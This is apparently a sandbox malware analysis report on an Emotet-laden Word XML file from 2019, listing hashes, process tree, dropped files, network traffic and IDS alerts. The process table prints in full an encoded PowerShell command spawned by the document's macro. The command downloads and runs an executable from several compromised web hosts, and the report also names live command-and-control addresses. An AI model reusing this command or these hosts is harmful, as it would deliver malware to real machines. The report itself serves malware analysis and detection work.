File name: | US1690230194492646444.doc |
Full analysis: | https://app.any.run/tasks/00acd836-a4d2-43d5-9b2d-8b027b5e40e7 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | February 11, 2019, 11:11:49 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags: | |
Indicators: | |
MIME: | text/xml |
File info: | XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators |
MD5: | ED673A2E62C0A7B4B4798FEE5C03740E |
SHA1: | 814AD77D20B5AC6A5F0915CCF647234BF85DDCFE |
SHA256: | 53B0784F219135BC4164DC3B89F39B421863E7282C50D1955B13DD559CFA3370 |
SSDEEP: | 3072:fSTBCe6+NcSDZjgRtjvIOzdksMGA8zfI/oEQ9gjjRWjIkYqLjL/xSu90OoiLuDKm:f2N9IbIydQGAuYQGgjtzxUOmD+XfwL7 |
.xml | | | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1) |
---|---|---|
.xml | | | Microsoft Office XML Flat File Format (ASCII) (31) |
.xml | | | Generic XML (ASCII) (2.3) |
.html | | | HyperText Markup Language (1.4) |
WordDocumentBodySectSectPrDocGridLine-pitch: | 360 |
---|---|
WordDocumentBodySectSectPrColsSpace: | 720 |
WordDocumentBodySectSectPrPgMarGutter: | - |
WordDocumentBodySectSectPrPgMarFooter: | 720 |
WordDocumentBodySectSectPrPgMarHeader: | 720 |
WordDocumentBodySectSectPrPgMarLeft: | 1440 |
WordDocumentBodySectSectPrPgMarBottom: | 1440 |
WordDocumentBodySectSectPrPgMarRight: | 1440 |
WordDocumentBodySectSectPrPgMarTop: | 1440 |
WordDocumentBodySectSectPrPgSzH: | 15840 |
WordDocumentBodySectSectPrPgSzW: | 12240 |
WordDocumentBodySectSectPrRsidR: | 005E6EE1 |
WordDocumentBodySectPRT: | |
WordDocumentBodySectPRPictShapeImagedataTitle: | - |
WordDocumentBodySectPRPictShapeImagedataSrc: | wordml://H4DbuISpwPOIS |
WordDocumentBodySectPRPictShapeStyle: | width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square |
WordDocumentBodySectPRPictShapeType: | #_x0000_t75 |
WordDocumentBodySectPRPictShapeSpid: | _x0000_i1025 |
WordDocumentBodySectPRPictShapeId: | Picture 1 |
WordDocumentBodySectPRPictBinData: | (Binary data 145376 bytes, use -b option to extract) |
WordDocumentBodySectPRPictBinDataName: | wordml://H4DbuISpwPOIS |
WordDocumentBodySectPRPictShapetypeLockAspectratio: | t |
WordDocumentBodySectPRPictShapetypeLockExt: | edit |
WordDocumentBodySectPRPictShapetypePathConnecttype: | rect |
WordDocumentBodySectPRPictShapetypePathGradientshapeok: | t |
WordDocumentBodySectPRPictShapetypePathExtrusionok: | f |
WordDocumentBodySectPRPictShapetypeFormulasFEqn: | if lineDrawn pixelLineWidth 0 |
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: | miter |
WordDocumentBodySectPRPictShapetypeStroked: | f |
WordDocumentBodySectPRPictShapetypeFilled: | f |
WordDocumentBodySectPRPictShapetypePath: | m@4@5l@4@11@9@11@9@5xe |
WordDocumentBodySectPRPictShapetypePreferrelative: | t |
WordDocumentBodySectPRPictShapetypeSpt: | 75 |
WordDocumentBodySectPRPictShapetypeCoordsize: | 21600,21600 |
WordDocumentBodySectPRPictShapetypeId: | _x0000_t75 |
WordDocumentBodySectPRRPrNoProof: | - |
WordDocumentBodySectPRRsidRPr: | 002F49D9 |
WordDocumentBodySectPRsidRDefault: | 008F337A |
WordDocumentBodySectPRsidR: | 008F337A |
WordDocumentDocPrRsidsRsidVal: | 005A24B1 |
WordDocumentDocPrRsidsRsidRootVal: | 005E6EE1 |
WordDocumentDocPrCompatDontGrowAutofit: | - |
WordDocumentDocPrCompatUseAsianBreakRules: | - |
WordDocumentDocPrCompatWrapTextWithPunct: | - |
WordDocumentDocPrCompatSnapToGridInCell: | - |
WordDocumentDocPrCompatBreakWrappedTables: | - |
WordDocumentDocPrAlwaysShowPlaceholderTextVal: | off |
WordDocumentDocPrIgnoreMixedContentVal: | off |
WordDocumentDocPrSaveInvalidXMLVal: | off |
WordDocumentDocPrValidateAgainstSchema: | - |
WordDocumentDocPrPixelsPerInchVal: | 120 |
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: | - |
WordDocumentDocPrOptimizeForBrowser: | - |
WordDocumentDocPrCharacterSpacingControlVal: | DontCompress |
WordDocumentDocPrPunctuationKerning: | - |
WordDocumentDocPrDefaultTabStopVal: | 720 |
WordDocumentDocPrDoNotEmbedSystemFonts: | - |
WordDocumentDocPrRemovePersonalInformation: | - |
WordDocumentDocPrZoomPercent: | 100 |
WordDocumentDocPrViewVal: | |
WordDocumentShapeDefaultsShapelayoutIdmapData: | 1 |
WordDocumentShapeDefaultsShapelayoutIdmapExt: | edit |
WordDocumentShapeDefaultsShapelayoutExt: | edit |
WordDocumentShapeDefaultsShapedefaultsSpidmax: | 1026 |
WordDocumentShapeDefaultsShapedefaultsExt: | edit |
WordDocumentDocSuppDataBinData: | (Binary data 135864 bytes, use -b option to extract) |
WordDocumentDocSuppDataBinDataName: | UD6Cnwl |
WordDocumentStylesStyleRPrRFontsCs: | Tahoma |
WordDocumentStylesStyleRPrRFontsH-ansi: | Tahoma |
WordDocumentStylesStyleRPrRFontsAscii: | Tahoma |
WordDocumentStylesStyleRsidVal: | 005A24B1 |
WordDocumentStylesStyleLinkVal: | BalloonTextChar |
WordDocumentStylesStyleBasedOnVal: | Normal |
WordDocumentStylesStyleTblPrTblCellMarRightType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarRightW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarBottomType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarBottomW: | - |
WordDocumentStylesStyleTblPrTblCellMarLeftType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarLeftW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarTopType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarTopW: | - |
WordDocumentStylesStyleTblPrTblIndType: | dxa |
WordDocumentStylesStyleTblPrTblIndW: | - |
WordDocumentStylesStyleUiNameVal: | Table Normal |
WordDocumentStylesStyleRPrLangBidi: | AR-SA |
WordDocumentStylesStyleRPrLangFareast: | EN-US |
WordDocumentStylesStyleRPrLangVal: | EN-US |
WordDocumentStylesStyleRPrSz-csVal: | 22 |
WordDocumentStylesStyleRPrSzVal: | 22 |
WordDocumentStylesStyleRPrFontVal: | Calibri |
WordDocumentStylesStylePPrSpacingLine-rule: | auto |
WordDocumentStylesStylePPrSpacingLine: | 259 |
WordDocumentStylesStylePPrSpacingAfter: | 160 |
WordDocumentStylesStyleNameVal: | Normal |
WordDocumentStylesStyleStyleId: | Normal |
WordDocumentStylesStyleDefault: | on |
WordDocumentStylesStyleType: | paragraph |
WordDocumentStylesLatentStylesLsdExceptionName: | Normal |
WordDocumentStylesLatentStylesLatentStyleCount: | 375 |
WordDocumentStylesLatentStylesDefLockedState: | off |
WordDocumentStylesVersionOfBuiltInStylenamesVal: | 7 |
WordDocumentFontsFontSigCsb-1: | 00000000 |
WordDocumentFontsFontSigCsb-0: | 000001FF |
WordDocumentFontsFontSigUsb-3: | 00000000 |
WordDocumentFontsFontSigUsb-2: | 00000009 |
WordDocumentFontsFontSigUsb-1: | C0007841 |
WordDocumentFontsFontSigUsb-0: | E0002AFF |
WordDocumentFontsFontPitchVal: | variable |
WordDocumentFontsFontFamilyVal: | Roman |
WordDocumentFontsFontCharsetVal: | 00 |
WordDocumentFontsFontPanose-1Val: | 02020603050405020304 |
WordDocumentFontsFontName: | Times New Roman |
WordDocumentFontsDefaultFontsCs: | Times New Roman |
WordDocumentFontsDefaultFontsH-ansi: | Calibri |
WordDocumentFontsDefaultFontsFareast: | Calibri |
WordDocumentFontsDefaultFontsAscii: | Calibri |
WordDocumentDocumentPropertiesVersion: | 16 |
WordDocumentDocumentPropertiesCharactersWithSpaces: | 12 |
WordDocumentDocumentPropertiesParagraphs: | 1 |
WordDocumentDocumentPropertiesLines: | 1 |
WordDocumentDocumentPropertiesCharacters: | 12 |
WordDocumentDocumentPropertiesWords: | 1 |
WordDocumentDocumentPropertiesPages: | 1 |
WordDocumentDocumentPropertiesLastSaved: | 2019:02:08 21:40:00Z |
WordDocumentDocumentPropertiesCreated: | 2019:02:08 21:40:00Z |
WordDocumentDocumentPropertiesTotalTime: | - |
WordDocumentDocumentPropertiesRevision: | 1 |
WordDocumentIgnoreSubtreeVal: | http://schemas.microsoft.com/office/word/2003/wordml/sp2 |
WordDocumentOcxPresent: | no |
WordDocumentEmbeddedObjPresent: | no |
WordDocumentMacrosPresent: | yes |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
192 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\US1690230194492646444.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.5123.5000 | ||||
3056 | Powershell -e JABwAFoAQgBrAFgARwBuAD0AKAAnAHQAOQA1AG0AaAByACcAKwAnAFoARQAnACkAOwAkAFQAQgB3AEEATgBwAGoAcgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB6AFQARwBIAGMAWAA9ACgAJwBoAHQAJwArACcAdAAnACsAJwBwADoAJwArACcALwAvAGsAJwArACcAdQByAHoAYQBsAC4AcgAnACsAJwB1AC8AJwArACcAdwBvAHIAZAAnACsAJwBwAHIAZQBzACcAKwAnAHMALwB3ACcAKwAnAHAAJwArACcALQBjAG8AbgB0AGUAbgB0ACcAKwAnAC8AdQBwACcAKwAnAGwAbwAnACsAJwBhAGQAJwArACcAcwAvAGMAJwArACcAegB0ADcAJwArACcAWQBkAFQAaQAzAHIAJwArACcAWgBWACcAKwAnAF8AcABhADcAJwArACcAQABoAHQAdAAnACsAJwBwADoALwAvAGwAYQBiACcAKwAnAHQAZQAnACsAJwByAHAAYQBkAHUALgB1AGwAbQAnACsAJwAuAGEAYwAnACsAJwAuACcAKwAnAGkAZAAvADcAJwArACcANwBnACcAKwAnAEwAbAAnACsAJwA2AEgAJwArACcANgBxAFAAQABoAHQAdABwADoAJwArACcALwAnACsAJwAvAGQAdQBrAGUAbgAnACsAJwAuAGsAegAvAFMAJwArACcATwAnACsAJwBIACcAKwAnAE0AbABNAHYAegAnACsAJwBAAGgAdAAnACsAJwB0AHAAJwArACcAOgAnACsAJwAvACcAKwAnAC8AYwBvAG0AcABlAHgALQBvAG4AbABpAG4AZQAnACsAJwAuACcAKwAnAHIAJwArACcAdQAvADEAdgAzACcAKwAnAFAAJwArACcAcABQAEoAQQA2AEMAQABoAHQAJwArACcAdABwADoAJwArACcALwAvAG0AJwArACcAYQByAGsAZQAnACsAJwB0AGkAbgBnAG8AbgAnACsAJwBsAGkAJwArACcAbgBlAC4AdgBuAC8AdwBwACcAKwAnAC0AJwArACcAYQBkAG0AaQBuACcAKwAnAC8AUwBvAGoAYwAnACsAJwBsACcAKwAnAFkANwAnACsAJwBSAHMAbABhACcAKwAnAGIAJwArACcAbQBfACcAKwAnADQAMgAzAGwANgAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABTAEUARwBNAFQAbgBQAD0AKAAnAGIAJwArACcAZgBpAG4AJwArACcAWAA1AGkAMwAnACkAOwAkAHcAagBCAGsAbgBPACAAPQAgACgAJwA3ADcAJwArACcANgAnACkAOwAkAEkAcwBDAEoATwB3AGsAagA9ACgAJwBmACcAKwAnAGoATgB3AHQAWgAnACsAJwBxAE4AJwApADsAJABGAFEAVgBKADIARwB3AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB3AGoAQgBrAG4ATwArACgAJwAuAGUAJwArACcAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEYATQAzAGQAWQBSAFMAIABpAG4AIAAkAHoAVABHAEgAYwBYACkAewB0AHIAeQB7ACQAVABCAHcAQQBOAHAAagByAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAEYATQAzAGQAWQBSAFMALAAgACQARgBRAFYASgAyAEcAdwApADsAJABHAHEAcwBrAEwAVABWAGoAPQAoACcAcQBuAEQAJwArACcAcgBRAG4AJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQARgBRAFYASgAyAEcAdwApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAEYAUQBWAEoAMgBHAHcAOwAkAHcAZgBEAHEAOQBHADUAMAA9ACgAJwBoAGYAegBwAEQARQBsACcAKwAnAGkAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHcANQBkAEQAMgBYADAAPQAoACcAYgBpACcAKwAnAEcAWAB0AE8ATgAnACkAOwA= | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2684 | "C:\Users\admin\776.exe" | C:\Users\admin\776.exe | — | Powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1848 | "C:\Users\admin\776.exe" | C:\Users\admin\776.exe | 776.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1324 | "C:\Users\admin\AppData\Local\turnedavatar\turnedavatar.exe" | C:\Users\admin\AppData\Local\turnedavatar\turnedavatar.exe | 776.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2908 | "C:\Users\admin\AppData\Local\turnedavatar\turnedavatar.exe" | C:\Users\admin\AppData\Local\turnedavatar\turnedavatar.exe | turnedavatar.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1004 | "C:\Users\admin\AppData\Local\turnedavatar\SchKa4Y1.exe" | C:\Users\admin\AppData\Local\turnedavatar\SchKa4Y1.exe | — | turnedavatar.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: MS DTC transaction manager DLL Exit code: 0 Version: 2001.12.4414.258 | ||||
1760 | "C:\Users\admin\AppData\Local\turnedavatar\SchKa4Y1.exe" | C:\Users\admin\AppData\Local\turnedavatar\SchKa4Y1.exe | SchKa4Y1.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: MS DTC transaction manager DLL Exit code: 0 Version: 2001.12.4414.258 | ||||
2428 | "C:\Users\admin\AppData\Local\turnedavatar\turnedavatar.exe" | C:\Users\admin\AppData\Local\turnedavatar\turnedavatar.exe | SchKa4Y1.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: MS DTC transaction manager DLL Exit code: 0 Version: 2001.12.4414.258 | ||||
2188 | "C:\Users\admin\AppData\Local\turnedavatar\turnedavatar.exe" | C:\Users\admin\AppData\Local\turnedavatar\turnedavatar.exe | turnedavatar.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: MS DTC transaction manager DLL Version: 2001.12.4414.258 |
PID | Process | Filename | Type | |
---|---|---|---|---|
192 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6D20.tmp.cvr | — | |
MD5:— | SHA256:— | |||
192 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6FF23FFA.tmp | — | |
MD5:— | SHA256:— | |||
3056 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VX7KCOBCL4D6BK64AGPZ.temp | — | |
MD5:— | SHA256:— | |||
192 | WINWORD.EXE | C:\Users\admin\Desktop\~$1690230194492646444.doc | pgc | |
MD5:FF6917A129A3429BC8AF6AB71A1A8172 | SHA256:626EC8D727AE02B4AD873CF7C6DFE1C2A3BD464F2651914BDD7045A5A0ABADFE | |||
192 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:E4B0E6FECFD8DB1350FEFC8D2B449533 | SHA256:839D9D8EA691C822F0AEB017A82C2A23B5C29A95D072B923FA24E68337318344 | |||
3056 | Powershell.exe | C:\Users\admin\776.exe | executable | |
MD5:A34CB7CE9E31490B6B52B0C712D232D5 | SHA256:F1BFCAA158F166833E28DC7270166000284C3AC1ED35BE59EE79C3639DF46FA6 | |||
2908 | turnedavatar.exe | C:\Users\admin\AppData\Local\turnedavatar\SchKa4Y1.exe | executable | |
MD5:352C3D3FC58E6599E3F72075C0CFBFC4 | SHA256:6F3423D4E498F456CFFAF91734A422C6C6C4B0677BB457042154CDB9FC12B3FB | |||
192 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:01E8640036D4267AA0E31847C2AF868E | SHA256:CD355976E671F21BE35544256A9577BA563E9D71AEA5FFAAACFC9CB1502B2C39 | |||
2188 | turnedavatar.exe | C:\Users\admin\AppData\Local\turnedavatar\turnedavatara.exe | executable | |
MD5:3290D6946B5E30E70414990574883DDB | SHA256:0E9294E1991572256B3CDA6B031DB9F39CA601385515EE59F1F601725B889663 | |||
3056 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | binary | |
MD5:A3B85C6C5DE0C3123985DEB717A95A18 | SHA256:76333D2387D11B88CAAEB4FC2A7737BCFD5B252ED0D713B632A2A1BA60CF0B58 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3056 | Powershell.exe | GET | 301 | 213.79.113.120:80 | http://kurzal.ru/wordpress/wp-content/uploads/czt7YdTi3rZV_pa7 | RU | html | 271 b | suspicious |
2908 | turnedavatar.exe | GET | 200 | 133.242.164.31:7080 | http://133.242.164.31:7080/ | JP | binary | 117 Kb | malicious |
3056 | Powershell.exe | GET | 200 | 213.79.113.120:80 | http://kurzal.ru/wordpress/wp-content/uploads/czt7YdTi3rZV_pa7/ | RU | executable | 359 Kb | suspicious |
2188 | turnedavatar.exe | GET | 200 | 133.242.164.31:7080 | http://133.242.164.31:7080/ | JP | binary | 193 Kb | malicious |
2188 | turnedavatar.exe | GET | 200 | 133.242.164.31:7080 | http://133.242.164.31:7080/ | JP | binary | 148 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2188 | turnedavatar.exe | 133.242.164.31:7080 | — | SAKURA Internet Inc. | JP | malicious |
3056 | Powershell.exe | 213.79.113.120:80 | kurzal.ru | OJSC Comcor | RU | suspicious |
2908 | turnedavatar.exe | 133.242.164.31:7080 | — | SAKURA Internet Inc. | JP | malicious |
Domain | IP | Reputation |
---|---|---|
kurzal.ru |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3056 | Powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3056 | Powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3056 | Powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2908 | turnedavatar.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2188 | turnedavatar.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2188 | turnedavatar.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |